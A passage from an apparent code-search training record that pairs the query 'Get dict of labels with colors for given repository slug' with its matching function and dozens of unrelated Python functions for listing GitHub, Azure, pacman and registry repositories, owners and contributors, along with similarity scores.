get_known_repos() -> List[str]:\n return [db.name for db in PacmanConfig(conf=\"/etc/pacman.conf\").initialize_alpm().get_syncdbs()]", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def repos():\n print(\"\\nThe following repos are available.\\n\")\n NAME_SHELF = shelve.open(str(PurePath(SHELF_DIR / \"NAME_SHELF\")))\n INDEX_SHELF = shelve.open(str(PurePath(SHELF_DIR / \"INDEX_SHELF\")))\n\n print(\"{:<4} {:<20} {:<}\".format(\"Key\", \"| Name\", \"| Path\"))\n print(\"******************************************\")\n for key in INDEX_SHELF.keys():\n name = INDEX_SHELF[key]\n print(\"{:<4} {:<20} {:<}\".format(key, name, str(NAME_SHELF[name])))\n INDEX_SHELF.close()\n NAME_SHELF.close()", "def n_public_repos(gh, user):\n return getuser(gh, user).public_repos", "def query_repositories():\n return buildapi.query_repositories()", "def get_registries():\n url = \"/\".join([REGISTRY_BASE, \"_catalog\"])\n response = req(url)\n if response is not None:\n return response[\"repositories\"]\n return []", "def repolist(orgname, refresh=True):\n filename = os.path.join(SETTINGS[\"folder\"], orgname.lower()) + \"/repodata.json\"\n if not refresh and os.path.isfile(filename):\n repodata = json.loads(open(filename, \"r\").read()) # read cached data\n else:\n endpoint = \"/orgs/\" + orgname.lower() + \"/repos?per_page=100\"\n repodata = github_allpages(endpoint=endpoint)\n dicts2json(repodata, filename)\n print(\n f\"\\r{orgname} - {len(repodata)} total public non-forked repos found\"\n + 60 * \" \"\n )\n\n return sorted(\n [\n (repo[\"name\"].lower(), repo[\"size\"])\n for repo in repodata\n if not repo[\"private\"] and not repo[\"fork\"]\n ]\n )", "def urls(gh, user):\n return [repo.url for repo in getuserrepos(gh, user)]", "def get_repos(self):\n return requests.get(\"https://api.github.com/user/repos\",\n headers=self.headers).json", "def repos(self):\r\n return repositories.Repos(self)", "def repositories(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ConfigurationServiceGitRepositoryArgs']]]]:\n return pulumi.get(self, \"repositories\")", "def get_repos(self):\n\n if self.url == 'test':\n repos = ['feature', 'dev', 'int']\n else:\n repos = []\n\n return repos", "def _get_repo_contributors(self, owner, repo):\n url = f\"{BASE_URL}/repos/{owner}/{repo}/contributors\"\n return self.fetch_all_pages(url, flatten=True, query_params={\"per_page\": 100})", "def addons_repositories(self) -> list[str]:\n return self._data[ATTR_ADDONS_CUSTOM_LIST]", "def fetch_repos(self):\n logging.info(\"Fetching repositories in: %s\" % self.name)\n list_cmd = [\n \"az\",\n \"acr\",\n \"repository\",\n \"list\",\n \"-n\",\n self.name,\n \"-o\",\n \"tsv\",\n ]\n\n result = run_cmd(list_cmd)\n\n if result[\"returncode\"] != 0:\n logging.error(result[\"err_msg\"])\n raise AzureError(result[\"err_msg\"])\n\n logging.info(\"Successfully fetched repositories from: %s\" % self.name)\n repos = result[\"output\"].split(\"\\n\")[:-1]\n logging.info(\"Total number of repositories: %d\" % len(repos))\n\n return repos", "def get_owners_list(self):\n final_list = []\n for entry in self.bot_data_file[\"owners_data\"][\"owners_list\"]:\n final_list.append(str(entry[\"name\"]))\n if len(final_list) == 0:\n print(\"ERROR GETTING THE OWNERS LIST (i need at least 1 owner) - BOT ABORTING\")\n quit(1)\n else:\n return final_list", "def get_repo_contributors(owner, repo, session=None):\n url = f'{GITHUB_API_URL}/repos/{owner}/{repo}/stats/contributors'\n contributors = []\n for contributor in get_whole_response_as_json(url, session):\n contributor['login'] = contributor['author']['login']\n contributors.append(contributor)\n return contributors", "def getuserrepos(gh, user):\n repos = list()\n pages = int(math.ceil(n_public_repos(gh, user) / float(R_PAGE)))\n for i in range(pages):\n # github index their pages from 1, hence the +1\n qs = user + \"/repos?page=\" + str(i + 1)\n repos.extend(gh.users(qs).get())\n return repos", "def _get_org_repos(self):\n url = f\"{BASE_URL}/orgs/{ORG}/repos\"\n return self.fetch_all_pages(url, flatten=True, query_params={\"per_page\": 100})", "def list_all_repos_info():\n repos = ALL_REPOS\n for repo_name, repo in zip(repos, _repos(repos)):\n repo_name = shorten_path(repo_name)\n print(repo_name)\n try:\n nbr_ahead, nbr_behind = _nbr_commits_ahead_and_behind(repo)\n except git.exc.GitCommandError:\n print(f\" {repo.active_branch.name}\")\n except DetachedHeadError:\n print(f\" HEAD --> {repo.head.commit}\")\n else:\n nb_tabul = 3 if len(repo.active_branch.name) < 6 else 2\n tabuls = \"\\t\" * nb_tabul\n print(f\" {repo.active_branch.name}{tabuls}↓ {nbr_behind} ↑ {nbr_ahead}\")\n if repo.index.diff(None):\n print(\" !!! With unstaged changes !!!\")\n if repo.index.diff(\"HEAD\"):\n print(\" !!! With uncommited changes !!!\")", "def repos(self):\r\n return repos.Repos(self)", "def get_repositories():\n\n repos = json.loads(\n common.run_ffx_command(cmd=('--machine', 'json', 'repository', 'list'),\n check=True,\n capture_output=True).stdout.strip())\n to_prune = set()\n sdk_root_abspath = os.path.abspath(os.path.dirname(common.SDK_ROOT))\n for repo in repos:\n # Confirm the path actually exists. If not, prune list.\n # Also assert the product-bundle repository is for the current repo\n # (IE within the same directory).\n if not os.path.exists(repo['spec']['path']):\n to_prune.add(repo['name'])\n\n if not repo['spec']['path'].startswith(sdk_root_abspath):\n to_prune.add(repo['name'])\n\n repos = [repo for repo in repos if repo['name'] not in to_prune]\n\n remove_repositories(to_prune)\n return repos", "def get_repositories(self) -> None:\n\n self.log.info(\"Fetching repositories for %s\", self.name)\n\n catalog = self.raw_client.get_catalog().json()\n self.log.info(\"Found the following repositories in registry %s:\", self.name)\n for repo in catalog['repositories']:\n tags = self.raw_client.get_tags(repo).json()['tags']\n if tags is None:\n tags = []\n self.log.debug(\"\\t%s with %s tags\", repo, len(tags))\n self.repositories[repo] = Repository(name=repo, registry=self, tags=tags)\n self.log.info(self.repositories[repo])", "def get_repos_user(user='xmonader'):\n u = ghclient.get_user(login=user)\n repos = u.get_repos()\n repos_list = []\n for i in range(20):\n page = repos.get_page(i)\n if len(page) == 0:\n break\n repos_list.extend(repos.get_page(i))\n return repos_list", "def get_repos(self):\n\t\tsession = self.login()\n\t\titems = session.query(Repos)\n\t\tresponse = [row2dict(item) for item in items]\n\n\t\tself.logout(session)\n\t\treturn response", "def get_repositories(\n self, *, params: Optional[dict] = None\n ) -> \"resource_types.Repositories\":\n\n return communicator.Repositories(self.__requester).fetch(parameters=params)", "def list_imported_repos():\n repos = dict()\n # sys.modules should be a dict listing all imported modules and packages, even if they were imported by importing a\n # single function from them. We don't try to cut this down by comparing with globals() because:\n # 1. if a module/package/etc was imported as a dependency, we want to include it, and I doubt that globals() will\n # show that\n # 2. we're filtering for modules/packages/etc that exist in their Git repo, so this will exclude the majority of\n # packages installed via pip/conda/etc.\n for name, mod in sys.modules.items():\n try:\n this_repo = _get_git_repo(mod.__file__)\n except AttributeError:\n # Some modules do not have a __file__ attribute. If that's the case, we can be reasonably sure that they\n # do not have a git repo, so skip them.\n continue\n\n if this_repo is None:\n # Not in a repo, don't list it\n continue\n\n if this_repo.git_dir in repos.keys():\n prev_entry = repos[this_repo.git_dir]\n # Always use the shortest name for the module, assume that that is the top level of the package. Note:\n # this might need revisited with submodules/subrepos. It looks like, at least when importing modules, the\n # top level package gets included in the modules list, so this should always get the top level module, or\n # at least the top level one that has a git repo.\n if len(prev_entry['name']) > len(name):\n prev_entry['name'] = name\n else:\n repos[this_repo.git_dir] = {'name': name, 'repo': this_repo}\n\n # Organizing the repos dict with the paths as the key was just for convenience while updating to get the shortest\n # package name. It's nicer upon returning for the dict key to be the package name and the path to be in the value\n # dict. And we don't need to keep the path b/c it's in the repo object\n return {val['name']: val['repo'] for val in repos.values()}", "def getInfo(self):\n # get repos name\n result = {}\n for item in self.repos:\n info = self.get_details(repo=item)\n result[item] = info\n\n return result", "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def fake_get_user_repo_names_and_locations(self):\n self._get_user_repo_names_and_locations()", "def owners(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"owners\")", "def contributors(owner: str, repo: str, uname: Optional[str] = typer.Argument(None)):\n typer.echo(github.find_contributors_from_repo(owner=owner, repo=repo, uname=uname))", "def list_repos_cli(api_client, path_prefix, next_page_token):\n content = ReposApi(api_client).list(path_prefix, next_page_token)\n click.echo(pretty_format(content))", "def get_repo_names(sheet, json_key):\n # Use creds to create a client to interact with the Google Drive API\n scope = ['https://spreadsheets.google.com/feeds']\n creds = ServiceAccountCredentials.from_json_keyfile_name(json_key, scope)\n client = gspread.authorize(creds)\n \n \n # Load repos from the spreadsheet\n try:\n records = client.open(sheet).get_worksheet(0).get_all_records()\n rtrn = list({rec[\"repo_name\"] for rec in records if rec[\"use_repo\"] == 1})\n rtrn.sort()\n print(\"Got %s repos.\" %(len(rtrn)))\n return rtrn\n except gspread.exceptions.SpreadsheetNotFound as e:\n print(\"\\nSpreadsheet not found. Did you share the sheet with the client email in your JSON oauth file?\")\n all_sheets = client.openall()\n for s in all_sheets:\n print(s.title)\n print(\"\\n\")\n raise e", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def get_repo_options(account, **kwargs):\n client = AsyncHTTPClient()\n uri = \"https://api.github.com/user/repos?per_page=100\"\n data = []\n while uri is not None:\n req = account.get_request(uri, headers={\"Accept\": \"application/vnd.github.moondragon+json\"})\n response = yield client.fetch(req)\n response_object = json.loads(response.body.decode('utf-8'))\n data += response_object\n links = parse_link_header(response.headers.get('Link', ''))\n uri = links.get('next', None)\n return [{\"title\": repo['full_name'], \"value\": repo['full_name']}\n for repo in data]", "def user_repos(self, username: str) -> requests.Response:\n\n api_url = 'https://api.github.com/users/{username}/repos'\n url = api_url.format(username=username)\n response = requests.get(url)\n return response\n\n\n\n #user_url = self.user_info(username=username)\n #repos_url = user_url\n #pprint.pprint(repos_url)\n #url = repos_url['repos_url']\n #response = requests.get(url)\n #return response", "def get_owners_command(client: Client) -> COMMAND_OUTPUT: # pragma: no cover\n url = '/api/v3/security/owners?resultLimit=500'\n response, status = client.make_request(Method.GET, url)\n\n readable_output: str = tableToMarkdown(name=f\"{INTEGRATION_NAME} - Owners\",\n t=list(response))\n\n return readable_output, {}, list(response)", "def repository_projects(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository_projects\", host, owner, repo)", "def get_repo_packages() -> List['Package']:\n return Package.get_packages_from_expac(\"-S\", [], PossibleTypes.REPO_PACKAGE)", "def owners(self):\n return self.properties.get('owners',\n DirectoryObjectCollection(self.context, ResourcePath(\"owners\", self.resource_path)))", "def repo_info(self, attempt=1):\n\n response = self.postman.request('repo_list', page=attempt)\n\n if (response.status_code == requests.codes.ok):\n if (len(response.json()) != 0):\n for repo in response.json():\n self.repo_list.append(repo['name'])\n\n self.repo_info(attempt=attempt + 1)", "def find_repos(source_connection):\n\n #TODO\n # Check version to avoid hard coding\n # \n\n cassandra_home = find_binary_path(source_connection)\n repositories = []\n\n if cassandra_home != \"\":\n # cassandra home is defined\n name = \"Cassnadra ({})\".format(\"3.6\")\n repository_definition = RepositoryDefinition(cassandra_home = cassandra_home, pretty_name=name)\n repositories.append(repository_definition)\n\n return repositories", "def list_collaborator_repos(self):\n user = User.objects.get(username=self.username)\n\n return Collaborator.objects.filter(user=user)", "def get_repos(cls):\n dcSql = DevCenterSQL()\n repos = dcSql.get_repos()\n return {'status': True, 'data': repos}", "def get_all_repos(oauth_token, repo_name):\n print('Checking if the user can access the repo...')\n g = Github(oauth_token)\n print('\\tRunning as ' + g.get_user().name)\n all_repos = g.get_user().get_repos()\n all_repos_full_name = []\n for test in list(all_repos):\n all_repos_full_name.append(test.full_name)\n if repo_name in all_repos_full_name:\n return True\n else:\n print('Repo \"' + repo_name + '\" is not in the list')\n print('Here\\'s a list of all repos I can see:')\n for each_repo in all_repos:\n print('\\t' + each_repo.full_name)\n return False", "def _list_repos(is_json):\n\n package_manager = _get_package_manager()\n repos = package_manager.get_repos()\n\n if is_json:\n return emitter.publish(repos)\n elif repos.get(\"repositories\"):\n repos = [\"{}: {}\".format(repo.get(\"name\"), repo.get(\"uri\"))\n for repo in repos.get(\"repositories\")]\n emitter.publish(\"\\n\".join(repos))\n else:\n msg = (\"There are currently no repos configured. \"\n \"Please use `dcos package repo add` to add a repo\")\n raise DCOSException(msg)\n\n return 0", "def repo_info():\n return TEST_REPOS_INFO[0]", "def get_repos(self):\n return [\n section for section in self.sections()\n if section not in self.reserved_sections\n ]", "def getContributors(auth):\n users = []\n r = requests.get(url='https://gist.github.com/paulmillr/2657075/',\n auth=auth)\n soup = BeautifulSoup(r.text, 'html.parser')\n users = [tr.select_one('a').text for tr in soup('tbody')[0].select('tr')]\n return users", "def getuserrepos_keys(gh, user):\n repos = getuserrepos(gh, user)\n return repos[0].keys()", "def test_print_security_repositories(self):\n self._uri({\n '%d.%d/maintained/sec%d/%s/Packages.gz' % (MAJOR, MINOR, 1, 'all'): DATA,\n '%d.%d/maintained/sec%d/%s/Packages.gz' % (MAJOR, MINOR, 1, ARCH): DATA,\n })\n tmp = self.u.print_security_repositories()\n self.assertEqual(set((\n 'deb file:///mock/%d.%d/maintained/ sec%d/%s/' % (MAJOR, MINOR, 1, 'all'),\n 'deb file:///mock/%d.%d/maintained/ sec%d/%s/' % (MAJOR, MINOR, 1, ARCH),\n )), set(tmp.splitlines()))", "def collect_org_repos(self):\n log.info(\"GHUB\", \"Collecting org repos.\")\n raw_repos = self._get_org_repos()\n preprocessed_repos = self._preprocess_repos(raw_repos)\n parsed_repos = json_reducer.reduce(REPOS_SCHEMA, preprocessed_repos)\n result = []\n for repo in parsed_repos:\n result.append(repo)\n return result", "def repositories(self):\n return [\n self.collection(self._registered_types[key])\n for key in self._registered_types\n ]", "def get_packages():\n packages = []\n for repo in repositories:\n packages.extend(repo.get_packages())\n return packages", "def get(self, *args, **kwargs):\r\n url = '{0}/user/repositories/'.format(self.parent.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def print(self):\n print(\"Repository list: \")\n for repo in self.list:\n print(\"- \" + repo.name)", "def get_members_repos(org_list):\n print(\"\\nGetting repositories of all members.\")\n jsonMembersRepo_list = []\n columns_list = [\n 'organization',\n 'user',\n 'full_name',\n 'fork',\n 'stargazers_count',\n 'forks_count',\n 'language',\n 'description'\n ]\n for org in org_list:\n print('\\nGetting members of', org)\n jsonMembers = load_json(\"https://api.github.com/orgs/\" + org +\n \"/members?per_page=100\")\n for member in jsonMembers:\n print('Getting repositories of', member['login'])\n jsonMembersRepos = load_json(\"https://api.github.com/users/\" +\n member['login'] +\n \"/repos?per_page=100\")\n for repo in jsonMembersRepos:\n # Add fields to make CSV file more usable\n repo['organization'] = org\n repo['user'] = member['login']\n # Python 2: Using smart_str to deal with encodings\n repo['description'] = smart_str(repo['description'])\n jsonMembersRepo_list.append(repo)\n generate_csv(\"members-list\", jsonMembersRepo_list, columns_list)", "def getPropertyOwners(self) -> List[unicode]:\n ...", "def get_all_contributors(request):\n response_dict = {}\n for project in constants.ACTIVE_REPOSITORIES:\n try:\n api_response = requests.get(\n constants.GITHUB_API_GET_CONTRIBUTORS_URL.format(project_name=project)\n )\n api_response_json = api_response.json()\n # if authentication fails\n if api_response.status_code == 401:\n raise Exception(\"Authentication fails. Invalid github access token.\")\n for contributor in api_response_json:\n if contributor['type'] != 'User':\n continue\n result = ContributorResponse(\n username=contributor['login'],\n url=contributor['html_url'],\n avatar_url=contributor['avatar_url'],\n contributions=contributor['contributions'],\n repository_name=[project],\n )\n if result.username in response_dict.keys():\n response_dict[result.username]['contributions'] += result.contributions\n response_dict[result.username]['repository_name'].append(project)\n else:\n response_dict[result.username] = result.to_json()\n except Exception:\n return DOWNSTREAM_ERROR_RESPONSE\n response = sorted(response_dict.values(), key=lambda x: x['contributions'], reverse=True)\n return Response(response)", "def list_(ctx: click.Context, repository_path):\n root_commands.cmd_list(ctx.obj, repository_path)", "def get_starred_repos(org_list):\n print(\"\\nGetting repositories starred by members.\")\n jsonMembersStarred_list = []\n columns_list = [\n 'organization',\n 'user',\n 'full_name',\n 'html_url',\n 'language',\n 'description'\n ]\n for org in org_list:\n print('\\nGetting members of', org)\n jsonMembers = load_json(\"https://api.github.com/orgs/\" + org +\n \"/members?per_page=100\")\n for member in jsonMembers:\n print('Getting starred repositories of', member['login'])\n jsonStarred = load_json(\"https://api.github.com/users/\" +\n member['login'] +\n \"/starred?per_page=100\")\n for repo in jsonStarred:\n repo['organization'] = org\n repo['user'] = member['login']\n # Python 2: Using smart_str to deal with encodings\n repo['description'] = smart_str(repo['description'])\n jsonMembersStarred_list.append(repo)\n generate_csv(\"starred-list\", jsonMembersStarred_list, columns_list)", "def list_repositories(self, state=None, json_out=False):\n states = ['active', 'archived', 'imported'] if state is None else [state]\n results = {}\n for get_state in states:\n repositories, errors = self.rest.get_backup_service_repositories(state=get_state)\n _exit_if_errors(errors)\n results[get_state] = repositories\n\n if json_out:\n print(json.dumps(results, indent=2))\n else:\n self.human_friendly_print_repositories(results)", "def get_org_list():\r\n\r\n resp = requests.get(''.join([Kegg.BASE_URL, 'list/organism']))\r\n return resp.text", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:\n try:\n role = pgsql.get_role(cursor, owner_name(owner))\n except KeyError:\n return []\n else:\n return pgsql.get_role_databases(cursor, role)", "def get_ontology_contributors(repo_path):\n url = 'https://api.github.com/repos/{}/contributors'.format(repo_path)\n # TODO: allow use of oath token;\n # GH has a quota for non-logged in API calls\n time.sleep(3)\n with closing(requests.get(url, stream=False)) as resp:\n ok = resp.status_code == 200\n if ok:\n results = resp.json()\n logging.info(\"RESP={}\".format(results))\n return results\n else:\n logging.error(\"Failed: {}\".format(url))\n return []", "def owners(self):\n return self.find_users_by_rel('owner')", "def fetch_all_repos_info():\n\n def fetch(*args, **kwargs):\n kwargs[\"remote\"].fetch()\n\n repos = ALL_REPOS\n for repo_name, repo in zip(repos, _repos(repos)):\n repo_name = shorten_path(repo_name)\n print(f\"fetching {repo_name}\")\n _try_for_all_remotes(\n repo, fetch, raise_on_exception=False, stop_on_success=False, verbose=True\n )", "def repository(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository\", host, owner, repo)", "def user_repositories(self, host: (str), user: (str)) -> Any:\n return search_api(\"user_repositories\", host, user)", "def get_public_repos(self, max_repos=DEFAULT_MAX_PUBLIC_REPOS):\n since = 0\n repo_count = 0\n repos = []\n while repo_count < max_repos:\n temp = self.process_repo(self.get_full_url(ALL_REPO_LIST.format(since=since)), True)\n repos.extend(temp)\n repo_count = len(repos) #TODO count if repos <= max_repos\n print 'repos =', len(repos), 'temp=', len(temp)\n since = temp[-1]['id']\n\n return repos", "def describe_repositories(self, registry_id=None, repository_names=None):\n if repository_names:\n for repository_name in repository_names:\n if repository_name not in self.repositories:\n raise RepositoryNotFoundException(\n repository_name, registry_id or DEFAULT_REGISTRY_ID\n )\n\n repositories = []\n for repository in self.repositories.values():\n # If a registry_id was supplied, ensure this repository matches\n if registry_id:\n if repository.registry_id != registry_id:\n continue\n # If a list of repository names was supplied, esure this repository\n # is in that list\n if repository_names:\n if repository.name not in repository_names:\n continue\n repositories.append(repository.response_object)\n return repositories", "def get(self) -> Iterable[instarepo.github.Repo]:\n return self._filter_pushed_after(\n self._filter_pushed_before(\n self._filter_language(\n self._filter_prefix(\n self._filter_forks(\n self._filter_archived(\n self.github.get_all_repos(self.sort, self.direction)\n )\n )\n )\n )\n )\n )", "def test_list_repos():\n repos = common_funcs.list_repos()\n\n assert isinstance(repos, list)", "def repository_dependencies(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository_dependencies\", host, owner, repo)", "def get_repositories(github_user):\n\n if not github_user:\n return [1, {\"message\": \"GitHub username missing\"}]\n else:\n\n # build Request object\n request = urllib2.Request(\"https://api.github.com/users/\"\n + str(github_user) + \"/repos\")\n request.get_method = lambda: 'GET'\n try:\n '''try to send the request to the GitHub API and\n create Python dictionary from JSON response'''\n repositories = urllib2.urlopen(request)\n repositories = json.loads(\"\\n\".join(repositories.readlines()))\n\n return [0, repositories]\n\n except urllib2.HTTPError as e:\n\n # return HTTP error and the message from the API\n return [1, {\"message\": str(e) + \": \"\n + json.loads('\\n'.join(e.readlines()))['message']}]", "def lookup_allowed_private_repos(namespace):\n repos_allowed = 0\n current_plan = get_namespace_plan(namespace)\n\n if features.RH_MARKETPLACE:\n namespace_user = model.user.get_namespace_user(namespace)\n\n subscriptions = check_internal_api_for_subscription(namespace_user)\n for subscription in subscriptions:\n if subscription is not None:\n repos_allowed += subscription[\"privateRepos\"]\n\n # Find the number of private repositories used by the namespace and compare it to the\n # plan subscribed.\n if current_plan is not None:\n repos_allowed += current_plan[\"privateRepos\"]\n\n private_repos = model.user.get_private_repo_count(namespace)\n return private_repos < repos_allowed", "def list_repository_directory(self, entity):\n\n members = []\n\n # There is no directory object if this is the repository root\n path = ''\n if 'directory' in entity.objects:\n path = entity.objects['directory']['path']\n\n for entry in self.cache.get_repository_tree(entity.objects['project'], entity.objects['ref'], path):\n if entry['type'] in ('blob', 'tree'):\n members.append(entry['name'])\n\n return members", "def fetch_owner_accounts():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n return owner_accounts", "def org_info(self):\n\n response = self.postman.request('info')\n\n if (response.status_code == requests.codes.ok):\n data = response.json()\n\n self.repos = data['public_repos']\n self.created = data['created_at']\n self.updated = data['updated_at']\n\n self.repo_info()\n self.member_info()", "def owners(self):\n return self._owners", "def owners(self):\n return self._owners", "def project_owners(limit=None):\n tx = cypher_transaction()\n query = \"\"\"MATCH (p:project)-[:OWNED_BY]->(u:user) RETURN u, p\"\"\"\n if limit is not None:\n query += \" LIMIT {limit}\"\n tx.append(query, parameters={'limit': limit})\n else:\n tx.append(query)\n\n results = tx.commit()\n owners = [] # Just a list of user nodes\n for record in _first(results):\n user, project = record.values\n print(\"{0} is owned by {1}\".format(project['name'], user['name']))\n owners.append(user)\n return owners" ]
[ "0.7608418", "0.7267118", "0.7101556", "0.70416945", "0.6976196", "0.69618136", "0.6874849", "0.6862077", "0.68582284", "0.68060064", "0.6804673", "0.6765574", "0.67367995", "0.67278445", "0.67108905", "0.66979", "0.6602462", "0.6571694", "0.65691054", "0.6552383", "0.6520411", "0.6479025", "0.64617926", "0.64311785", "0.64091647", "0.6400867", "0.6396747", "0.63924646", "0.6376847", "0.6374998", "0.6339376", "0.62980723", "0.62977654", "0.6275646", "0.6261007", "0.6259236", "0.6232033", "0.6226945", "0.62142205", "0.62026376", "0.61564124", "0.61549956", "0.6141024", "0.6136196", "0.6121799", "0.61130077", "0.61064935", "0.6103521", "0.6072846", "0.60516536", "0.60421103", "0.60096735", "0.59917104", "0.597065", "0.5965023", "0.59428895", "0.59301186", "0.5928308", "0.5920155", "0.59060913", "0.5893575", "0.5890095", "0.58853257", "0.58802027", "0.58780503", "0.58733046", "0.58700955", "0.58527195", "0.58524054", "0.58512104", "0.58388853", "0.58153087", "0.5814408", "0.58134896", "0.5811761", "0.5799641", "0.5796002", "0.57940966", "0.57786024", "0.57735777", "0.5751356", "0.57505447", "0.5736426", "0.5731422", "0.5730501", "0.5727629", "0.5705432", "0.5685909", "0.5685506", "0.5674843", "0.567163", "0.56710416", "0.56416935", "0.5640376", "0.56359553", "0.56357026", "0.5631973", "0.563041", "0.563041", "0.5624084" ]
0.78467643
0
Get dict of labels with colors for given repository slug
def list_labels(self, repository): data = self._get_all_data('/repos/{}/labels'.format(repository)) return {l['name']: str(l['color']) for l in data}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def colors_for_labels():\n colors = [(i * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1]) % 255).astype(np.uint8) for i in range(len(CATEGORY))]\n #colors = np.array(range(len(COCO_INSTANCE_CATEGORY_NAMES))) * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\n #colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def get_colors():\n colors = {}\n for h in wn.synset('chromatic_color.n.01').hyponyms():\n colors[h.lemmas()[0].name()] = [l.name() for l in h.lemmas()]\n colors[h.lemmas()[0].name()].extend(all_hyponyms(h)) \n for h in wn.synset('achromatic_color.n.01').hyponyms():\n colors[h.lemmas()[0].name()] = [l.name() for l in h.lemmas()]\n colors[h.lemmas()[0].name()].extend(all_hyponyms(h)) \n return colors", "def make_labels(painting):\n labels = {}\n for dcTitleLang, dcTitle in \\\n painting['object']['proxies'][0]['dcTitle'].iteritems():\n labels[dcTitleLang] = {'language': dcTitleLang, 'value': dcTitle[0]}\n return labels", "def get_colour_map(self):\n try:\n return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green',\n 'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange',\n 'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff',\n 'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid',\n 'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise',\n 'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab',\n 'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum',\n 'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon',\n 'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'}\n\n # If colour not found to match, return grey as a last resort\n except KeyError as e:\n print('Unmatched colour: {0}'.format(e))\n return 'Grey'", "def list_labels(service, repo):\n app = App()\n if repo:\n serv = app.get_service(service, repo=repo)\n else:\n serv = app.guess_service()\n repo_labels = serv.list_labels()\n if not repo_labels:\n print(\"No labels.\")\n return\n print(tabulate([\n (\n label.name,\n label.color,\n label.description\n )\n for label in repo_labels\n ], tablefmt=\"fancy_grid\"))", "def assign_colour_label_data(catl):\n\n logmstar_arr = catl.logmstar.values\n u_r_arr = catl.modelu_rcorr.values\n\n colour_label_arr = np.empty(len(catl), dtype='str')\n for idx, value in enumerate(logmstar_arr):\n\n # Divisions taken from Moffett et al. 2015 equation 1\n if value <= 9.1:\n if u_r_arr[idx] > 1.457:\n colour_label = 'R'\n else:\n colour_label = 'B'\n\n if value > 9.1 and value < 10.1:\n divider = 0.24 * value - 0.7\n if u_r_arr[idx] > divider:\n colour_label = 'R'\n else:\n colour_label = 'B'\n\n if value >= 10.1:\n if u_r_arr[idx] > 1.7:\n colour_label = 'R'\n else:\n colour_label = 'B'\n \n colour_label_arr[idx] = colour_label\n \n catl['colour_label'] = colour_label_arr\n\n return catl", "def map_label_colors(array, ignore_vals=[0]):\n colset = [(166, 206, 227),\n (31, 120, 180),\n (178, 223, 138),\n (51, 160, 44),\n (251, 154, 153),\n (227, 26, 28),\n (253, 191, 111),\n (255, 127, 0),\n (202, 178, 214),\n (106, 61, 154),\n (255, 255, 153),\n (177, 89, 40)]\n levels = np.unique(array)\n levels = [l for l in levels if l not in ignore_vals]\n if len(levels) == 0:\n return\n if len(levels) == 1:\n return({levels[0]: colset[0]})\n step = len(colset) / (len(levels) - 1)\n\n col_idx = np.arange(0, len(colset), step)\n colors = {}\n for idx in range(len(levels)):\n colors[levels[idx]] = colset[col_idx[idx]]\n return colors", "def get_labels():\n return {\"contradiction\": 0, \"neutral\": 1, \"entailment\": 2}", "def milestone_labels(argv=None):\n argv = argv or sys.argv[1:]\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('color', help='color to make the labels')\n\n args = parser.parse_args(argv)\n\n session = GithubSession()\n\n labels = session.get_labels()\n\n labels_by_name = dict([(label['name'], label) for label in labels])\n\n for milestone in session.get_milestones():\n label_name = f'epic:{milestone[\"title\"]}'\n\n if label_name in labels_by_name:\n continue\n\n labels_by_name[label_name] = session.create_label(label_name, args.color)\n\n return labels_by_name", "def cvpr2018_labels():\n\n return {\n 0: 'others',\n 33: 'car',\n 34: 'motorcycle',\n 35: 'bicycle',\n 36: 'pedestrian',\n 38: 'truck',\n 39: 'bus',\n 40: 'tricycle'\n }", "def get_labels(pr_id):\n label_json = get_status_json(pr_id, 'labels')\n current_labels = [l['name'] for l in label_json]\n return current_labels", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def get_node_color(node_label):\n for NODE_KEY in list(NODE_TYPES.keys()):\n if node_label in NODE_TYPES[NODE_KEY]:\n return NODE_COLOR_DICT[NODE_KEY]\n try:\n x = int(node_label)\n return NODE_COLOR_DICT['Terminals']\n except:\n try:\n x = float(node_label)\n return NODE_COLOR_DICT['Terminals']\n except:\n try:\n node_label = node_label.replace(\"\\'\", \"\\\"\")\n tree = json.loads(node_label)\n for key in tree.keys():\n if key not in NODE_TYPES['Learner Params']:\n return NODE_COLOR_DICT['Uncategorized']\n else:\n try:\n x = int(tree[key])\n except:\n try:\n x = float(tree[key])\n except:\n return NODE_COLOR_DICT['Uncategorized']\n return NODE_COLOR_DICT['Learner Params']\n except:\n return NODE_COLOR_DICT['Uncategorized']\n return NODE_COLOR_DICT['Uncategorized']", "def compute_colors_for_labels(self, labels):\n colors = labels[:, 